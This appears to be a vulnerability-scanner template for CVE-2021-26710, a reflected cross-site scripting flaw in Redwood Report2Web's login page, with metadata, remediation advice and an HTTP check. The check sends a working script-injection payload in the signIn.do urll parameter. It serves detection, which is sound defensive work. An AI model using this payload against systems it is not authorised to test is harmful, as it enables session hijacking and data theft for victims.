id: CVE-2021-26710 info: name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting author: pikpikcu severity: medium description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://vict0ni.me/report2web-xss-frame-injection.html - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2021-26710 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26710 cwe-id: CWE-79 epss-score: 0.00114 epss-percentile: 0.44746 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redwood product: report2web tags: cve2021,cve,redwood,xss http: - method: GET path: - "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - ">" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950